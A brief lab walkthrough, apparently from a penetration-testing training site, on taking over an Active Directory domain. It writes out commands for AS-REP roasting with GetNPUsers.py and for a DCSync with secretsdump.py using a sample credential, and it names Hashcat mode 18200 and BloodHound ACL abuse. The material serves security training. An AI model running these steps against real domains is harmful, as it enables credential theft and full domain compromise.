On this page
Lab Details
- Objectives
- Request TGT hashes via GetNPUsers.py.
- Crack hashes using Hashcat mode 18200.
- Execute DCSync via secretsdump.py.
- Prerequisites
- Kerberos Authentication ProtocolsImpacket Framework
- Tools
- ImpacketBloodHoundHashcatEvil-WinRM
Overview
Active Directory misconfigurations allow rapid lateral movement. This walkthrough covers kerberos roasting and ACL exploitation.
Key Exploitation Steps
-
AS-REP Roasting:
Terminal window GetNPUsers.py CORP.LOCAL/ -no-pass -usersfile users.txt -dc-ip 10.10.120.5 -
Privilege Escalation via BloodHound: Compromised account possessed GenericAll rights over
svc_sql, which held DCSync permissions. -
DCSync Domain Takeover:
Terminal window secretsdump.py CORP.LOCAL/svc_sql:'Pass123!'@10.10.120.5 -just-dc-ntlm